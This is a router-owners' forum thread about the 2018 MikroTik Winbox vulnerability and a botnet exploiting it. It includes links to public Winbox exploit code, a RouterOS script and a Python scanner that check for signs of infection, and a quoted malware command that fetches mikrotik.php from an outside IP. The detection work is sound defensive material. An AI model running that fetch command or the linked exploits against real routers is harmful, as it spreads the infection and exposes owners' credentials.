It's already in the blog, because it is the same vulnerability.
@normis, hey can you get this on the blog? I'd like to see any complainers cut off at the pass that this announcement didn't end up in the right spots.
I'm with @Samot. If it's worth a forum post, it's worth posting a similar update to the blog. As soon as the blog was announced I added it to my important RSS feeds so I get fast notifications.
@normis, hey can you get this on the blog? I'd like to see any complainers cut off at the pass that this announcement didn't end up in the right spots.
It is like: I do not like this song as I have never listened to it earlier and the title is boring me.
On forum posts if the subject line doesn't interest me, I would never read it.
lol. Nice try, but the analogy is weak. A song can be in the background and doesn't consume any time.
It is like: I do not like this song as I have never listened to it earlier and the title is boring me.
On forum posts if the subject line doesn't interest me, I would never read it.
So, is 6.40.8 secured against this vulnerability or is it not?
Hi Normis,
what you wrote above may look to someone as if 6.40.8 (bugfix) is not secure either. I would like you to mention that this bugfix release is secure too (the blog needs correction too, but at least it mentions that 6.40.8 is OK).
What's new in 6.40.8 (2018-Apr-23 11:34):
!) winbox - fixed vulnerability that allowed to gain access to an unsecured router;
On the first link WinboxExploit.py reveals that the admin password is stored in the clear in the device. It simply requests the userdb and prints stuff found at offset 55. Mind == blown.
This vulnerability is from 6.28. I try it:
https://github.com/BigNerd95/WinboxExploit
https://github.com/BasuCert/WinboxPoC
Even that could get hacked. It is exposed to annoying dictionary attacks all the time. Nowadays, best practice is to simply work through carefully secured and encrypted VPNs and nothing else open to the public.
Personally I leave ssh open but that's the only thing and I really hope that doesn't get hacked...
From "now on"? Really? Like stated repeatedly, this has been fixed a long time ago. This is just a reminder AGAIN to please upgrade, where all these things are fixed.
Hopefully the userdb (and every bit doing anything with passwords in ROS) gets hashes for passwords from now on, and hopefully a modern one.
So why would they post this again if it was fixed in April?
According to the changelog it is fixed
What's new in 6.40.8 (2018-Apr-23 11:34):
!) winbox - fixed vulnerability that allowed to gain access to an unsecured router;
Yes, from "now on". Figuratively speaking - a few months is almost nothing when you have hundreds of thousands of devices out in the wild. As others already mentioned, do not expect people to promptly install your 0-day fix (as I reckon, there were some communication glitches along the way, too). I still see neighborhood MT devices on way old versions in DCs around the globe. That aside, your quick reaction and fix is exemplary, so we should thank you for that. But please allow some of us to be a little skeptical after the fact that in 2018 you still stored (past tense) something as sensitive in the device as a password, in clear text. Anyway, hoping for the best and life goes on.
From "now on"? Really? Like stated repeatedly, this has been fixed a long time ago. This is just a reminder AGAIN to please upgrade, where all these things are fixed.
Hopefully the userdb (and every bit doing anything with passwords in ROS) gets hashes for passwords from now on, and hopefully a modern one.
Figuratively asking: Are you saying that Mikrotik has hundreds of thousands of devices? No, users are the owners of them....
Yes, from "now on". Figuratively speaking - a few months is almost nothing when you have hundreds of thousands of devices out in the wild. As others already mentioned, do not expect people to promptly install your 0-day fix (as I reckon, there were some communication glitches along the way, too). I still see neighborhood MT devices on way old versions in DCs around the globe....
The email was released AFTER the news about the botnet. It again happened after negative publicity hit the media, despite the fact that I was many times asking to send the email earlier.
So to me, it looks like Mikrotik has done all it could to notify the users, well done Mikrotik, very proud to be a Mikrotik Evangelist
No arguments against the importance of applying updates in time by owners whatsoever. But you're aware that car makers get sued for dysfunctional parts or functional parts having design mistakes, right? That's because they didn't do everything in their power and ability to prevent problems leading to (fatal) accidents. It's exactly because you can't tell users what to do that you need to do everything you can to prevent disasters such as this. If the passwords were stored as (strong) hashes, the security hole wouldn't have existed to begin with. Well, being able to get the user db is still a problem, but by far not as serious. The only thing I'm pissed about is the pw storage which has been allegedly fixed along with the Winbox sechole (and very quickly, at that). And don't get me wrong, I will continue to use and advocate MT devices, they're great but these small mishaps are the ones that usually ruin the reputation of any thriving company.
Figuratively asking: Are you saying that Mikrotik has hundreds of thousands of devices? No, users are the owners of them.
Should Mikrotik call/inform each user/owner and "persuade" them to upgrade? What if the user says NO? What if admins in a DC ignore such info?
I'm not the "advocatus diaboli" of Mikrotik but you should apply the right measure to the problem.
If a car company makes a mistake in a car, it calls people to a service point, but someone ignoring this call will be using a bad car forever.
If a food company needs to collect some "bad" food from the market, in spite of problems in the production process, it is impossible to persuade anyone to return it. All owners could be asked to return it but nothing more.
It all depends on the users'/owners' will!!!
OK. There was a problem spotted and repaired ... a lot of programs/devices had, have and will have them ... period.
I'm not the "advocatus diaboli" of Mikrotik but you should apply the right measure to the problem.
Once again:
OK. There was a problem spotted and repaired ... a lot of programs/devices had, have and will have them ... period.
I'm not the "advocatus diaboli" of Mikrotik but you should apply the right measure to the problem.
The problem is/was resolved ... time to apply cure. IF YOU WANT. If not ... stop blaming Mikrotik again and again for the past.
What sorts of changes are being made?
Since the attacker is inserting his script into the targeted routers and changing the configuration in them, we recommend carefully inspecting the configuration of your device, restoring it from verified backups or export files, and following the generic advice in the above links.
What is potentially of interest is:
What sorts of changes are being made?
Since the attacker is inserting his script into the targeted routers and changing the configuration in them, we recommend carefully inspecting the configuration of your device, restoring it from verified backups or export files, and following the generic advice in the above links.
Are there particular modifications that might be indicative in a config?
Can we see some examples?
Many thanks.
Have you read the first post of this thread?
So what about version 6.40.8, is it vulnerable or not? Could somebody from Mikrotik finally confirm it?
Bugfix release tree
So what about version 6.40.8, is it vulnerable or not? Could somebody from Mikrotik finally confirm it?
# Check 1: the attacker's script moves the SOCKS port away from the default 1080
:if ([/ip socks get port] = 1080) do={:log info "Socks port is still Default."} else={:log info "Socks Port changed Possible infection!"}
# Check 2: SOCKS should normally be disabled on an edge router
:if ([/ip socks get enabled] = false) do={:log info "Socks is not on."} else={:log info "Socks is enabled... that could be bad!"}
# Checks 3 and 4: the dropped PHP file (RouterOS file names are case-sensitive, so both spellings are tested)
:if ([:len [/file find name="mikrotik.php"]] > 0) do={:log info "!!!mikrotik.php!!! File Detected!"} else={:log info "mikrotik.php not found."}
:if ([:len [/file find name="Mikrotik.php"]] > 0) do={:log info "!!!Mikrotik.php!!! File Detected!"} else={:log info "Mikrotik.php not found."}
# Check 5: the extra "service" user that an infected router ends up with
:if ([:len [/user find name="service"]] > 0) do={:log info "!!!YOU WERE BREACHED!!!"} else={:log info "No sign of the service user."}
Look in scripts and schedule.
I have found one of my customer's routers infected. How can I clean it remotely?
I have changed the socks port to default and disabled it. I have not found another user like admin. The password is changed. But in the files there is the mikrotik.php. If I delete this, after 5 seconds it's new.
Firmware now is 6.42.6. It's a hAP lite. Winbox in Services is disabled, only Web over port 80 is active and blocked from outside on my core router.
Thanks
/tool fetch address=95.154.216.163 port=2008 src-path=/mikrotik.php mode=http
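As an added example (not code from the thread or from MikroTik), the same indicators the check script above looks for, applied offline to a `/export` file, which is practical when many devices have to be reviewed and explains why "look in scripts and schedule" matters: the scheduler entry that re-fetches mikrotik.php is what brings the file back after deletion. The sample export is constructed and ATTACKER_IP is a placeholder; file presence on the flash is not visible in an export, so that check stays on the router itself.

```python
import re

# Constructed sample of a RouterOS "/export" (not taken from the thread) with
# the indicators discussed: socks enabled on a non-default port, a scheduler
# entry re-fetching mikrotik.php, an unexpected "service" user.
# ATTACKER_IP is a placeholder, not an address from the thread.
SAMPLE_EXPORT = """\
/ip socks
set enabled=yes port=4145
/system scheduler
add interval=5s name=u113 on-event="/tool fetch address=ATTACKER_IP port=2008 \\
    src-path=/mikrotik.php mode=http" policy=ftp,read,write
/user
add name=service group=full
"""

SUSPICIOUS_FETCH = re.compile(r"/tool fetch|mikrotik\.php", re.IGNORECASE)


def commands(export_text):
    """Yield (menu_path, command) pairs, joining backslash-continued lines."""
    path, buf = None, ""
    for raw in export_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):   # blank line or export header
            continue
        buf = f"{buf} {line}" if buf else line
        if buf.endswith("\\"):                  # command continues on next line
            buf = buf[:-1].rstrip()
            continue
        if buf.startswith("/"):                 # a menu path such as "/ip socks"
            path = buf
        elif path:
            yield path, buf
        buf = ""


def scan_export(export_text):
    """Return findings for the indicators the thread's check script looks for."""
    findings = []
    for path, cmd in commands(export_text):
        if path == "/ip socks":
            if "enabled=yes" in cmd:
                findings.append("socks proxy enabled")
            port = re.search(r"\bport=(\d+)", cmd)
            if port and port.group(1) != "1080":
                findings.append(f"socks port changed to {port.group(1)}")
        elif path in ("/system scheduler", "/system script") and SUSPICIOUS_FETCH.search(cmd):
            findings.append(f"{path}: {cmd}")
        elif path == "/user" and re.search(r'\bname="?service"?(\s|$)', cmd):
            findings.append("unexpected user 'service'")
    return findings
```

Any scheduler or script entry it reports should be read in full before removal, since a legitimate `/tool fetch` (for example an update job you created yourself) matches the same pattern.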